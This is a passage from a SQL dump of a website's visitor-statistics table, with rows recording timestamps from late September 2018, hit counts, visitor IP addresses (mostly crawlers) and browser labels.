1,0,0,'95.163.255.175','other'),(308874,1538042626,1,1,0,0,'54.36.148.27','other'),(308875,1538042737,1,1,0,0,'216.244.66.241','other'),(308876,1538042920,2,2,0,0,'54.36.149.17','other'),(308877,1538043083,1,1,0,0,'66.249.64.131','chrome'),(308878,1538043212,1,1,0,0,'54.36.148.217','other'),(308879,1538043259,1,1,0,0,'54.36.148.137','other'),(308880,1538043457,1,1,0,0,'95.163.255.170','other'),(308881,1538043506,1,1,0,0,'95.163.255.181','other'),(308882,1538043713,1,1,0,0,'54.36.148.68','other'),(308883,1538043761,1,1,0,0,'54.36.148.221','other'),(308884,1538043991,1,1,0,0,'178.154.244.62','other'),(308885,1538044551,1,1,0,0,'54.36.148.181','other'),(308886,1538044670,1,1,0,0,'54.36.148.191','other'),(308887,1538044735,2,2,0,0,'54.36.148.80','other'),(308888,1538044897,1,1,0,0,'54.36.149.31','other'),(308889,1538044902,1,1,0,0,'66.249.64.131','chrome'),(308890,1538045034,1,1,0,0,'95.163.255.197','other'),(308891,1538045189,2,2,0,0,'95.134.192.169','firefox'),(308892,1538045235,1,1,0,0,'54.36.149.77','other'),(308893,1538045348,2,2,0,0,'178.154.171.88','other'),(308894,1538045380,1,1,0,0,'87.250.224.46','other'),(308895,1538045427,2,2,0,0,'216.244.66.241','other'),(308896,1538045436,1,1,0,0,'178.154.244.62','other'),(308897,1538045511,1,1,0,0,'37.9.113.101','other'),(308898,1538045575,5,5,0,0,'141.8.142.74','other'),(308899,1538045614,1,1,0,0,'178.154.244.34','other'),(308900,1538045622,1,1,0,0,'54.36.148.120','other'),(308901,1538045852,1,1,0,0,'54.36.148.50','other'),(308902,1538045945,1,1,0,0,'8.29.198.27','other'),(308903,1538046047,1,1,0,0,'46.164.130.92','chrome'),(308904,1538046241,1,1,0,0,'8.29.198.26','other'),(308905,1538046249,1,1,0,0,'37.9.113.182','other'),(308906,1538046501,2,2,0,0,'178.154.171.88','other'),(308907,1538046579,1,1,0,0,'91.196.178.161','chrome'),(308908,1538046641,1,1,0,0,'87.250.224.46','other'),(308909,1538046785,1,1,0,0,'141.8.142.74','other'),(308910,1538046848,1,1,0,0,'54.36.148.215','other'),(308911,1538046939,1,1,0,0,'54.36.149.46','other'),(308912,1538047237,1,1,0,0,'54.36.148.15','other'),(308913,1538047299,1,1,0,0,'54.36.149.39','other'),(308914,1538047362,1,1,0,0,'54.36.149.53','other'),(308915,1538047445,1,1,0,0,'95.163.255.99','other'),(308916,1538047458,1,1,0,0,'216.244.66.241','other'),(308917,1538047544,1,1,0,0,'54.36.148.62','other'),(308918,1538047627,5,5,0,0,'178.154.171.88','other'),(308919,1538047632,1,1,0,0,'54.36.149.13','other'),(308920,1538048011,4,4,0,0,'141.8.142.74','other'),(308921,1538048015,1,1,0,0,'54.36.149.92','other'),(308922,1538048102,1,1,0,0,'40.77.167.58','other'),(308923,1538048151,1,1,0,0,'54.36.148.53','other'),(308924,1538048343,1,1,0,0,'54.36.149.41','other'),(308925,1538048380,1,1,0,0,'37.9.113.182','other'),(308926,1538048440,1,1,0,0,'178.154.244.62','other'),(308927,1538048620,4,4,0,0,'178.154.171.88','other'),(308928,1538048664,1,1,0,0,'54.36.148.217','other'),(308929,1538048729,1,1,0,0,'54.36.148.121','other'),(308930,1538048951,1,1,0,0,'178.154.244.34','other'),(308931,1538048969,4,4,0,0,'87.250.224.46','other'),(308932,1538049291,1,1,0,0,'95.163.255.170','other'),(308933,1538049361,1,1,0,0,'54.36.148.214','other'),(308934,1538049552,1,1,0,0,'37.9.113.182','other'),(308935,1538049580,4,4,0,0,'141.8.142.74','other'),(308936,1538049614,5,5,0,0,'178.154.171.88','other'),(308937,1538049794,1,1,0,0,'54.36.148.170','other'),(308938,1538049837,1,1,0,0,'54.36.148.222','other'),(308939,1538049877,1,1,0,0,'54.36.148.89','other'),(308940,1538049934,1,1,0,0,'54.36.148.220','other'),(308941,1538049993,1,1,0,0,'54.36.148.224','other'),(308942,1538050205,1,1,0,0,'54.36.148.145','other'),(308943,1538050206,4,4,0,0,'87.250.224.46','other'),(308944,1538050212,1,1,0,0,'54.36.148.234','other'),(308945,1538050337,1,1,0,0,'54.36.148.79','other'),(308946,1538050417,1,1,0,0,'54.36.149.48','other'),(308947,1538050426,1,1,0,0,'66.249.64.137','chrome'),(308948,1538050446,1,1,0,0,'54.36.148.229','other'),(308949,1538050478,1,1,0,0,'8.29.198.26','other'),(308950,1538050541,1,1,0,0,'54.36.148.177','other'),(308951,1538050586,1,1,0,0,'95.132.26.213','firefox'),(308952,1538050596,5,5,0,0,'141.8.142.74','other'),(308953,1538050602,1,1,0,0,'34.241.142.164','chrome'),(308954,1538050665,5,5,0,0,'178.154.171.88','other'),(308955,1538050705,1,1,0,0,'54.36.149.55','other'),(308956,1538050707,1,1,0,0,'91.196.178.177','chrome'),(308957,1538050790,1,1,0,0,'95.163.255.152','other'),(308958,1538050857,1,1,0,0,'54.36.149.37','other'),(308959,1538051307,1,1,0,0,'54.36.148.199','other'),(308960,1538051423,1,1,0,0,'178.154.171.4','other'),(308961,1538051424,1,1,0,0,'178.154.244.65','other'),(308962,1538051465,1,1,0,0,'178.154.200.32','other'),(308963,1538051563,6,6,0,0,'141.8.142.74','other'),(308964,1538051919,1,1,0,0,'87.250.224.46','other'),(308965,1538052127,1,1,0,0,'37.73.174.151','chrome'),(308966,1538052157,1,1,0,0,'66.249.64.137','chrome'),(308967,1538052353,1,1,0,0,'87.250.224.85','other'),(308968,1538052591,1,1,0,0,'46.229.168.135','other'),(308969,1538052649,1,1,0,0,'37.9.113.134','other'),(308970,1538053046,1,1,0,0,'54.36.148.204','other'),(308971,1538053175,1,1,0,0,'54.36.149.2','other'),(308972,1538053192,1,1,0,0,'54.36.148.98','other'),(308973,1538053264,1,1,0,0,'54.36.149.45','other'),(308974,1538053296,1,1,0,0,'54.36.148.84','other'),(308975,1538053462,1,1,0,0,'54.36.148.170','other'),(308976,1538053739,1,1,0,0,'54.36.149.23','other'),(308977,1538053839,1,1,0,0,'54.36.148.83','other'),(308978,1538053956,1,1,0,0,'54.36.149.71','other'),(308979,1538054034,1,1,0,0,'54.36.149.99','other'),(308980,1538054114,1,1,0,0,'54.36.149.21','other'),(308981,1538054146,1,1,0,0,'54.36.149.38','other'),(308982,1538054806,1,1,0,0,'54.36.148.96','other'),(308983,1538055019,1,1,0,0,'54.36.148.129','other'),(308984,1538055020,1,1,0,0,'54.36.148.58','other'),(308985,1538055050,1,1,0,0,'54.36.148.219','other'),(308986,1538055055,1,1,0,0,'54.36.149.31','other'),(308987,1538055398,1,1,0,0,'54.36.148.113','other'),(308988,1538055498,1,1,0,0,'54.36.148.121','other'),(308989,1538055550,2,2,0,0,'66.249.64.135','chrome'),(308990,1538055574,1,1,0,0,'54.36.148.135','other'),(308991,1538055576,1,1,0,0,'95.163.255.150','other'),(308992,1538055618,1,1,0,0,'54.36.148.118','other'),(308993,1538055777,1,1,0,0,'66.249.64.131','chrome'),(308994,1538055861,1,1,0,0,'95.163.255.162','other'),(308995,1538055868,1,1,0,0,'77.111.247.66','chrome'),(308996,1538055954,1,1,0,0,'54.36.149.58','other'),(308997,1538056287,1,1,0,0,'66.249.64.137','chrome'),(308998,1538056461,1,1,0,0,'54.36.148.230','other'),(308999,1538056543,1,1,0,0,'54.36.149.105','other'),(309000,1538056673,1,1,0,0,'91.196.178.83','firefox'),(309001,1538056690,2,2,0,0,'216.244.66.241','other'),(309002,1538056712,1,1,0,0,'66.249.64.131','chrome'),(309003,1538056780,2,2,0,0,'8.29.198.25','other'),(309004,1538056783,1,1,0,0,'54.36.148.18','other'),(309005,1538057177,1,1,0,0,'54.36.149.52','other'),(309006,1538057457,1,1,0,0,'54.36.148.56','other'),(309007,1538057501,1,1,0,0,'54.36.149.9','other'),(309008,1538057565,1,1,0,0,'54.36.148.184','other'),(309009,1538057573,1,1,0,0,'54.36.148.57','other'),(309010,1538057585,1,1,0,0,'54.36.148.53','other'),(309011,1538057825,1,1,0,0,'195.64.182.43','chrome'),(309012,1538057854,1,1,0,0,'54.36.149.12','other'),(309013,1538057908,1,1,0,0,'54.36.148.179','other'),(309014,1538057914,1,1,0,0,'66.249.64.137','chrome'),(309015,1538058110,1,1,0,0,'54.36.148.218','other'),(309016,1538058240,2,2,0,0,'66.249.64.135','chrome'),(309017,1538058501,2,2,0,0,'91.196.178.79','chrome'),(309018,1538058577,1,1,0,0,'54.36.148.29','other'),(309019,1538058759,1,1,0,0,'54.36.148.171','other'),(309020,1538058764,1,1,0,0,'54.36.148.110','other'),(309021,1538058839,1,1,0,0,'178.154.200.8','other'),(309022,1538059142,1,1,0,0,'95.163.255.160','other'),(309023,1538059200,2,2,0,0,'54.36.148.148','other'),(309024,1538059235,1,1,0,0,'54.36.148.36','other'),(309025,1538059362,1,1,0,0,'66.249.70.27','chrome'),(309026,1538059486,1,1,0,0,'185.100.86.128','other'),(309027,1538059702,1,1,0,0,'54.36.148.71','other'),(309028,1538059877,1,1,0,0,'54.36.148.78','other'),(309029,1538059902,1,1,0,0,'54.36.148.174','other'),(309030,1538060003,1,1,0,0,'54.36.149.22','other'),(309031,1538060038,1,1,0,0,'62.141.37.236','other'),(309032,1538060053,1,1,0,0,'95.163.255.97','other'),(309033,1538060140,1,1,0,0,'95.163.255.159','other'),(309034,1538060191,1,1,0,0,'54.36.148.156','other'),(309035,1538060192,1,1,0,0,'91.196.178.189','chrome'),(309036,1538060246,2,2,0,0,'158.69.254.103','other'),(309037,1538060497,1,1,0,0,'54.36.149.68','other'),(309038,1538060528,1,1,0,0,'54.36.148.235','other'),(309039,1538060562,1,1,0,0,'54.36.148.62','other'),(309040,1538060589,1,1,0,0,'54.36.148.176','other'),(309041,1538060594,1,1,0,0,'54.36.149.92','other'),(309042,1538060709,1,1,0,0,'54.36.148.26','other'),(309043,1538060993,1,1,0,0,'54.36.148.99','other'),(309044,1538061008,1,1,0,0,'95.163.255.193','other'),(309045,1538061057,40,40,0,0,'5.9.154.69','other'),(309046,1538061205,1,1,0,0,'54.36.148.123','other'),(309047,1538061217,1,1,0,0,'5.248.226.239','chrome'),(309048,1538061235,1,1,0,0,'66.249.64.135','chrome'),(309049,1538061298,1,1,0,0,'8.29.198.25','other'),(309050,1538061467,1,1,0,0,'95.163.255.180','other'),(309051,1538061637,1,1,0,0,'54.36.148.155','other'),(309052,1538061872,19,19,0,0,'173.212.247.96','other'),(309053,1538062306,1,1,0,0,'54.36.148.202','other'),(309054,1538062535,1,1,0,0,'66.249.64.135','chrome'),(309055,1538062587,1,1,0,0,'54.36.149.3','other'),(309056,1538062622,1,1,0,0,'54.36.148.25','other'),(309057,1538062779,1,1,0,0,'5.248.226.239','chrome'),(309058,1538063037,1,1,0,0,'51.255.65.46','other'),(309059,1538063139,1,1,0,0,'54.36.148.108','other'),(309060,1538063206,1,1,0,0,'54.36.148.76','other'),(309061,1538063257,1,1,0,0,'66.249.64.137','chrome'),(309062,1538063367,1,1,0,0,'54.36.148.28','other'),(309063,1538063372,1,1,0,0,'54.36.148.89','other'),(309064,1538063391,1,1,0,0,'54.36.148.85','other'),(309065,1538063419,1,1,0,0,'54.36.149.107','other'),(309066,1538063467,1,1,0,0,'54.36.148.220','other'),(309067,1538063615,1,1,0,0,'54.36.148.22','other'),(309068,1538063684,1,1,0,0,'54.36.148.224','other'),(309069,1538063847,1,1,0,0,'66.249.64.131','chrome'),(309070,1538063853,1,1,0,0,'178.154.171.88','other'),(309071,1538063857,1,1,0,0,'141.8.142.74','other'),(309072,1538063860,1,1,0,0,'54.36.148.144','other'),(309073,1538063968,1,1,0,0,'54.36.148.20','other'),(309074,1538064094,1,1,0,0,'66.249.70.25','chrome'),(309075,1538064204,1,1,0,0,'54.36.148.185','other'),(309076,1538064495,1,1,0,0,'216.244.66.241','other'),(309077,1538064682,1,1,0,0,'95.163.255.155','other'),(309078,1538064745,1,1,0,0,'54.36.149.15','other'),(309079,1538065064,1,1,0,0,'66.249.64.131','chrome'),(309080,1538065172,1,1,0,0,'54.36.149.64','other'),(309081,1538065719,1,1,0,0,'54.36.148.128','other'),(309082,1538065788,1,1,0,0,'54.36.148.52','other'),(309083,1538065881,1,1,0,0,'54.36.148.186','other'),(309084,1538065972,1,1,0,0,'216.244.66.241','other'),(309085,1538066217,1,1,0,0,'54.36.148.123','other'),(309086,1538066255,1,1,0,0,'54.36.149.89','other'),(309087,1538066436,1,1,0,0,'54.36.148.248','other'),(309088,1538066512,1,1,0,0,'95.163.255.179','other'),(309089,1538066668,1,1,0,0,'54.36.148.19','other'),(309090,1538066674,1,1,0,0,'46.229.168.137','other'),(309091,1538066846,1,1,0,0,'54.36.148.187','other'),(309092,1538066847,1,1,0,0,'54.36.149.70','other'),(309093,1538066887,1,1,0,0,'95.163.255.155','other'),(309094,1538066927,1,1,0,0,'95.163.255.193','other'),(309095,1538067054,1,1,0,0,'54.36.148.24','other'),(309096,1538067103,1,1,0,0,'216.244.66.241','other'),(309097,1538067189,1,1,0,0,'54.36.148.97','other'),(309098,1538067196,1,1,0,0,'54.36.149.59','other'),(309099,1538067245,1,1,0,0,'54.36.148.39','other'),(309100,1538067295,1,1,0,0,'95.163.255.156','other'),(309101,1538067598,1,1,0,0,'54.36.149.33','other'),(309102,1538067622,1,1,0,0,'8.29.198.25','other'),(309103,1538067682,1,1,0,0,'54.36.148.30','other'),(309104,1538067825,1,1,0,0,'87.250.224.46','other'),(309105,1538067865,1,1,0,0,'54.36.148.108','other'),(309106,1538067910,1,1,0,0,'8.29.198.26','other'),(309107,1538068459,1,1,0,0,'54.36.148.69','other'),(309108,1538068582,1,1,0,0,'54.36.148.205','other'),(309109,1538068700,1,1,0,0,'54.36.148.64','other'),(309110,1538068890,1,1,0,0,'66.249.64.135','chrome'),(309111,1538068944,1,1,0,0,'31.135.132.128','chrome'),(309112,1538069136,1,1,0,0,'54.36.148.227','other'),(309113,1538069177,1,1,0,0,'54.36.148.152','other'),(309114,1538069275,1,1,0,0,'54.36.149.72','other'),(309115,1538069383,1,1,0,0,'66.249.64.131','chrome'),(309116,1538069503,1,1,0,0,'180.76.15.137','other'),(309117,1538069510,1,1,0,0,'54.36.148.84','other'),(309118,1538069663,1,1,0,0,'216.244.66.241','other'),(309119,1538069687,1,1,0,0,'54.36.148.115','other'),(309120,1538069862,1,1,0,0,'54.36.148.28','other'),(309121,1538070112,1,1,0,0,'93.73.173.105','chrome'),(309122,1538070178,1,1,0,0,'54.36.148.211','other'),(309123,1538070236,1,1,0,0,'54.36.149.98','other'),(309124,1538070239,1,1,0,0,'207.46.13.233','other'),(309125,1538070268,1,1,0,0,'95.163.255.161','other'),(309126,1538070640,22,22,0,0,'69.30.226.234','other'),(309127,1538070656,1,1,0,0,'54.36.149.27','other'),(309128,1538070816,1,1,0,0,'54.36.149.31','other'),(309129,1538070902,1,1,0,0,'54.36.149.23','other'),(309130,1538070992,1,1,0,0,'54.36.148.90','other'),(309131,1538071081,1,1,0,0,'141.8.142.96','other'),(309132,1538071136,1,1,0,0,'95.163.255.194','other'),(309133,1538071151,2,2,0,0,'216.244.66.241','other'),(309134,1538071160,1,1,0,0,'54.36.149.6','other'),(309135,1538071202,1,1,0,0,'54.36.148.78','other'),(309136,1538071233,1,1,0,0,'207.46.13.179','other'),(309137,1538071555,1,1,0,0,'54.36.148.215','other'),(309138,1538071561,1,1,0,0,'54.36.148.193','other'),(309139,1538071595,1,1,0,0,'54.36.148.253','other'),(309140,1538071825,2,2,0,0,'157.55.39.71','other'),(309141,1538072073,1,1,0,0,'54.36.149.85','other'),(309142,1538072104,1,1,0,0,'95.163.255.171','other'),(309143,1538072118,1,1,0,0,'54.36.149.39','other'),(309144,1538072123,1,1,0,0,'8.29.198.26','other'),(309145,1538072310,1,1,0,0,'54.36.148.131','other'),(309146,1538072947,1,1,0,0,'54.36.148.228','other'),(309147,1538073348,1,1,0,0,'54.36.149.64','other'),(309148,1538073663,1,1,0,0,'54.36.148.95','other'),(309149,1538073826,1,1,0,0,'66.249.64.135','chrome'),(309150,1538073837,1,1,0,0,'52.53.201.78','chrome'),(309151,1538073867,1,1,0,0,'54.36.148.114','other'),(309152,1538074096,1,1,0,0,'54.36.148.198','other'),(309153,1538074159,1,1,0,0,'178.154.171.81','other'),(309154,1538074302,1,1,0,0,'66.249.64.131','chrome'),(309155,1538074306,2,2,0,0,'66.249.64.137','chrome'),(309156,1538074374,1,1,0,0,'54.36.149.28','other'),(309157,1538074520,1,1,0,0,'54.36.148.26','other'),(309158,1538074814,1,1,0,0,'54.36.148.121','other'),(309159,1538074980,1,1,0,0,'54.36.149.42','other'),(309160,1538075250,1,1,0,0,'54.36.148.19','other'),(309161,1538075827,1,1,0,0,'95.163.255.166','other'),(309162,1538075913,1,1,0,0,'66.249.64.131','chrome'),(309163,1538076183,1,1,0,0,'54.36.148.166','other'),(309164,1538076392,1,1,0,0,'54.36.148.80','other'),(309165,1538076450,1,1,0,0,'54.36.148.232','other'),(309166,1538076959,1,1,0,0,'54.36.148.34','other'),(309167,1538076981,1,1,0,0,'95.163.255.188','other'),(309168,1538076994,1,1,0,0,'54.36.148.153','other'),(309169,1538077875,1,1,0,0,'54.36.148.14','other'),(309170,1538078079,1,1,0,0,'95.163.255.174','other'),(309171,1538078128,1,1,0,0,'207.46.13.230','other'),(309172,1538078153,1,1,0,0,'54.36.149.43','other'),(309173,1538078388,1,1,0,0,'54.36.149.31','other'),(309174,1538078474,1,1,0,0,'8.29.198.25','other'),(309175,1538078589,1,1,0,0,'54.36.148.158','other'),(309176,1538078743,1,1,0,0,'8.29.198.26','other'),(309177,1538078921,1,1,0,0,'54.36.148.239','other'),(309178,1538079138,1,1,0,0,'54.36.149.6','other'),(309179,1538079231,1,1,0,0,'54.36.149.52','other'),(309180,1538079285,1,1,0,0,'216.244.66.241','other'),(309181,1538079559,1,1,0,0,'54.36.148.212','other'),(309182,1538079671,1,1,0,0,'54.36.148.63','other'),(309183,1538079696,1,1,0,0,'54.36.148.104','other'),(309184,1538079707,1,1,0,0,'54.36.148.190','other'),(309185,1538079767,1,1,0,0,'54.36.148.75','other'),(309186,1538079939,1,1,0,0,'54.36.148.127','other'),(309187,1538080028,1,1,0,0,'54.36.148.253','other'),(309188,1538080386,1,1,0,0,'54.36.149.80','other'),(309189,1538080569,1,1,0,0,'54.36.148.66','other'),(309190,1538080670,1,1,0,0,'54.36.149.101','other'),(309191,1538080773,1,1,0,0,'54.36.148.216','other'),(309192,1538080786,1,1,0,0,'54.36.148.65','other'),(309193,1538080813,1,1,0,0,'54.36.148.72','other'),(309194,1538080850,1,1,0,0,'54.36.149.66','other'),(309195,1538081108,1,1,0,0,'54.36.148.162','other'),(309196,1538081239,1,1,0,0,'54.36.149.5','other'),(309197,1538081385,1,1,0,0,'54.36.148.97','other'),(309198,1538081420,1,1,0,0,'66.249.64.137','chrome'),(309199,1538081459,1,1,0,0,'54.36.149.13','other'),(309200,1538081890,1,1,0,0,'216.244.66.241','other'),(309201,1538082199,1,1,0,0,'95.163.255.175','other'),(309202,1538082575,1,1,0,0,'54.36.149.32','other'),(309203,1538082639,1,1,0,0,'95.163.255.98','other'),(309204,1538082875,1,1,0,0,'54.36.148.203','other'),(309205,1538082951,1,1,0,0,'8.29.198.26','other'),(309206,1538083085,1,1,0,0,'95.163.255.97','other'),(309207,1538083133,1,1,0,0,'54.36.149.101','other'),(309208,1538083185,1,1,0,0,'54.36.148.103','other'),(309209,1538083269,1,1,0,0,'66.249.64.131','chrome'),(309210,1538083459,1,1,0,0,'54.36.149.84','other'),(309211,1538083494,1,1,0,0,'95.163.255.194','other'),(309212,1538083518,1,1,0,0,'157.55.39.185','other'),(309213,1538083540,1,1,0,0,'95.163.255.173','other'),(309214,1538083656,1,1,0,0,'46.211.93.156','chrome'),(309215,1538083788,1,1,0,0,'54.36.148.240','other'),(309216,1538084016,2,2,0,0,'54.36.148.177','other'),(309217,1538084110,2,2,0,0,'216.244.66.241','other'),(309218,1538084220,1,1,0,0,'178.154.200.41','other'),(309219,1538084460,1,0,1,0,'66.249.64.135',''),(309220,1538084496,2,2,0,0,'178.154.171.88','other'),(309221,1538084861,2,2,0,0,'37.9.113.182','other'),(309222,1538084900,1,1,0,0,'54.36.148.207','other'),(309223,1538084990,1,1,0,0,'37.9.113.115','other'),(309224,1538085144,2,2,0,0,'87.250.224.46','other'),(309225,1538085154,1,1,0,0,'54.36.148.106','other'),(309226,1538085349,1,1,0,0,'54.36.149.83','other'),(309227,1538085645,1,1,0,0,'54.36.148.179','other'),(309228,1538085887,1,1,0,0,'54.36.148.171','other'),(309229,1538086005,1,1,0,0,'54.36.149.96','other'),(309230,1538086419,5,5,0,0,'144.76.14.153','other'),(309231,1538086590,1,1,0,0,'54.36.148.252','other'),(309232,1538086736,3,3,0,0,'216.244.66.241','other'),(309233,1538086752,1,1,0,0,'54.36.148.244','other'),(309234,1538086812,1,1,0,0,'54.36.149.13','other'),(309235,1538086967,1,1,0,0,'54.36.148.99','other'),(309236,1538087114,1,1,0,0,'178.63.34.189','other'),(309237,1538087292,2,2,0,0,'87.250.224.46','other'),(309238,1538087331,1,1,0,0,'157.55.39.185','other'),(309239,1538087408,1,1,0,0,'66.249.64.137','chrome'),(309240,1538087526,1,0,1,0,'66.249.64.131',''),(309241,1538087722,1,1,0,0,'95.163.255.168','other'),(309242,1538087766,1,1,0,0,'54.36.148.71','other'),(309243,1538087814,1,1,0,0,'54.36.148.119','other'),(309244,1538087824,1,1,0,0,'54.36.148.14','other'),(309245,1538087838,5,5,0,0,'178.154.171.88','other'),(309246,1538087867,1,1,0,0,'141.8.142.74','other'),(309247,1538087872,1,1,0,0,'178.154.244.62','other'),(309248,1538087888,1,1,0,0,'178.154.200.73','other'),(309249,1538087919,1,1,0,0,'193.194.127.177','chrome'),(309250,1538088056,1,1,0,0,'54.36.148.180','other'),(309251,1538088106,1,1,0,0,'95.163.255.182','other'),(309252,1538088118,1,1,0,0,'95.163.255.176','other'),(309253,1538088120,1,1,0,0,'95.163.255.152','other'),(309254,1538088197,1,1,0,0,'216.244.66.241','other'),(309255,1538088607,1,1,0,0,'95.163.255.98','other'),(309256,1538089005,2,2,0,0,'54.36.148.135','other'),(309257,1538089053,1,1,0,0,'54.36.149.102','other'),(309258,1538089075,1,1,0,0,'54.36.149.63','other'),(309259,1538089320,1,1,0,0,'8.29.198.26','other'),(309260,1538089332,1,1,0,0,'54.36.148.45','other'),(309261,1538089488,1,1,0,0,'54.36.149.70','other'),(309262,1538089542,1,1,0,0,'95.163.255.98','other'),(309263,1538089580,1,1,0,0,'8.29.198.27','other'),(309264,1538089705,1,1,0,0,'54.36.149.87','other'),(309265,1538089762,3,3,0,0,'178.154.171.88','other'),(309266,1538089834,1,0,1,0,'66.249.64.137',''),(309267,1538090023,1,1,0,0,'54.36.148.221','other'),(309268,1538090227,1,1,0,0,'66.249.64.137','chrome'),(309269,1538090457,1,1,0,0,'54.36.148.247','other'),(309270,1538090469,1,1,0,0,'54.36.148.31','other'),(309271,1538090571,1,1,0,0,'54.36.148.135','other'),(309272,1538090772,1,1,0,0,'54.36.148.14','other'),(309273,1538090937,7,7,0,0,'178.154.171.88','other'),(309274,1538091014,1,1,0,0,'54.36.148.194','other'),(309275,1538091083,1,1,0,0,'178.154.244.62','other'),(309276,1538091085,1,1,0,0,'141.8.142.74','other'),(309277,1538091091,1,1,0,0,'54.36.148.177','other'),(309278,1538091157,1,1,0,0,'54.36.148.70','other'),(309279,1538091305,1,1,0,0,'54.36.149.93','other'),(309280,1538091411,1,1,0,0,'157.55.39.185','other'),(309281,1538091653,1,1,0,0,'54.36.148.251','other'),(309282,1538091824,1,1,0,0,'54.36.148.37','other'),(309283,1538092006,1,1,0,0,'54.36.148.164','other'),(309284,1538092014,1,1,0,0,'54.36.149.64','other'),(309285,1538092100,1,1,0,0,'216.244.66.241','other'),(309286,1538092217,1,1,0,0,'54.36.149.24','other'),(309287,1538092356,1,1,0,0,'66.249.64.137','chrome'),(309288,1538092405,1,1,0,0,'54.36.148.72','other'),(309289,1538092418,1,1,0,0,'95.163.255.174','other'),(309290,1538092708,1,1,0,0,'141.8.142.74','other'),(309291,1538092919,1,1,0,0,'54.36.148.22','other'),(309292,1538093038,3,3,0,0,'178.154.171.88','other'),(309293,1538093042,1,1,0,0,'87.250.224.46','other'),(309294,1538093593,1,1,0,0,'95.163.255.155','other'),(309295,1538093784,1,1,0,0,'8.29.198.26','other'),(309296,1538093871,1,1,0,0,'54.36.148.94','other'),(309297,1538094265,2,2,0,0,'216.244.66.241','other'),(309298,1538094269,1,1,0,0,'54.36.148.51','other'),(309299,1538094313,1,0,1,0,'66.249.64.137',''),(309300,1538094399,1,1,0,0,'54.36.148.95','other'),(309301,1538094539,1,1,0,0,'54.36.149.100','other'),(309302,1538094699,1,1,0,0,'54.36.148.135','other'),(309303,1538094713,1,1,0,0,'95.163.255.170','other'),(309304,1538094807,1,1,0,0,'54.36.149.53','other'),(309305,1538095511,1,1,0,0,'54.36.148.126','other'),(309306,1538095604,5,5,0,0,'178.154.171.88','other'),(309307,1538095608,2,2,0,0,'141.8.142.74','other'),(309308,1538095609,3,3,0,0,'87.250.224.46','other'),(309309,1538095626,1,1,0,0,'178.154.200.41','other'),(309310,1538095627,1,1,0,0,'37.9.113.115','other'),(309311,1538095885,1,1,0,0,'66.249.64.135','chrome'),(309312,1538095935,1,0,1,0,'66.249.64.131',''),(309313,1538095939,1,1,0,0,'178.154.244.62','other'),(309314,1538096083,2,2,0,0,'54.36.149.45','other'),(309315,1538096127,1,1,0,0,'54.36.149.51','other'),(309316,1538096374,1,1,0,0,'54.36.148.150','other'),(309317,1538096639,2,2,0,0,'141.8.142.74','other'),(309318,1538096643,1,1,0,0,'178.154.171.88','other'),(309319,1538096913,1,1,0,0,'66.249.70.25','chrome'),(309320,1538097304,1,1,0,0,'54.36.148.198','other'),(309321,1538097576,1,1,0,0,'54.36.148.122','other'),(309322,1538097749,1,1,0,0,'54.36.148.170','other'),(309323,1538097818,1,1,0,0,'54.36.149.63','other'),(309324,1538098420,1,1,0,0,'54.36.149.58','other'),(309325,1538098568,1,1,0,0,'54.36.148.73','other'),(309326,1538098596,1,1,0,0,'54.36.148.247','other'),(309327,1538098614,1,1,0,0,'54.36.148.195','other'),(309328,1538098629,1,1,0,0,'54.36.149.37','other'),(309329,1538098740,1,1,0,0,'54.36.148.164','other'),(309330,1538099058,1,1,0,0,'54.36.148.93','other'),(309331,1538099106,1,1,0,0,'95.163.255.191','other'),(309332,1538099122,1,1,0,0,'95.163.255.197','other'),(309333,1538099222,1,1,0,0,'54.36.148.167','other'),(309334,1538099258,1,1,0,0,'54.36.148.45','other'),(309335,1538099398,1,1,0,0,'54.36.149.41','other'),(309336,1538099808,1,1,0,0,'66.249.64.135','chrome'),(309337,1538099972,1,1,0,0,'178.154.171.88','other'),(309338,1538100008,1,1,0,0,'216.244.66.241','other'),(309339,1538100158,2,2,0,0,'8.29.198.26','other'),(309340,1538100185,1,1,0,0,'54.36.148.60','other'),(309341,1538100454,2,2,0,0,'141.8.142.74','other'),(309342,1538100498,1,1,0,0,'54.36.148.139','other'),(309343,1538100781,1,1,0,0,'54.36.148.174','other'),(309344,1538101120,1,1,0,0,'66.249.64.135','chrome'),(309345,1538101152,1,1,0,0,'54.36.149.39','other'),(309346,1538101318,1,1,0,0,'54.36.148.133','other'),(309347,1538101587,1,1,0,0,'54.36.148.225','other'),(309348,1538102364,1,1,0,0,'216.244.66.241','other'),(309349,1538102388,1,1,0,0,'54.36.149.79','other'),(309350,1538102537,2,2,0,0,'66.249.70.29','chrome'),(309351,1538102715,1,1,0,0,'54.36.148.55','other'),(309352,1538102846,1,1,0,0,'54.36.149.57','other'),(309353,1538102847,1,1,0,0,'54.36.149.25','other'),(309354,1538102976,1,1,0,0,'37.9.113.138','other'),(309355,1538103043,1,1,0,0,'54.36.148.94','other'),(309356,1538103082,1,1,0,0,'54.36.148.127','other'),(309357,1538103326,1,1,0,0,'66.249.64.131','chrome'),(309358,1538103504,1,1,0,0,'54.36.148.179','other'),(309359,1538103739,28,28,0,0,'148.251.195.14','other'),(309360,1538103762,1,1,0,0,'54.36.148.241','other'),(309361,1538103838,1,1,0,0,'54.36.149.79','other'),(309362,1538104208,1,1,0,0,'35.165.132.122','chrome'),(309363,1538104278,1,0,1,0,'66.249.64.135',''),(309364,1538104293,1,1,0,0,'54.36.148.184','other'),(309365,1538104531,1,1,0,0,'54.36.148.189','other'),(309366,1538104616,1,1,0,0,'8.29.198.26','other'),(309367,1538104761,1,1,0,0,'54.36.149.18','other'),(309368,1538104859,1,1,0,0,'157.55.39.185','other'),(309369,1538104889,1,1,0,0,'216.244.66.241','other'),(309370,1538105032,1,1,0,0,'54.36.149.56','other'),(309371,1538105100,1,1,0,0,'54.36.148.109','other'),(309372,1538105314,1,1,0,0,'95.163.255.178','other'),(309373,1538105612,1,1,0,0,'54.36.148.243','other'),(309374,1538105767,1,1,0,0,'54.36.149.27','other'),(309375,1538105828,2,2,0,0,'54.36.148.223','other'),(309376,1538106025,1,1,0,0,'54.36.149.102','other'),(309377,1538106060,1,1,0,0,'95.163.255.192','other'),(309378,1538106072,1,1,0,0,'95.163.255.188','other'),(309379,1538106137,1,1,0,0,'95.163.255.177','other'),(309380,1538106706,1,1,0,0,'54.36.148.205','other'),(309381,1538106846,1,1,0,0,'54.36.148.251','other'),(309382,1538106979,1,1,0,0,'54.36.148.184','other'),(309383,1538107059,1,1,0,0,'54.36.149.38','other'),(309384,1538107109,1,1,0,0,'66.249.64.137','chrome'),(309385,1538107211,1,1,0,0,'216.244.66.241','other'),(309386,1538107279,1,1,0,0,'54.36.149.49','other'),(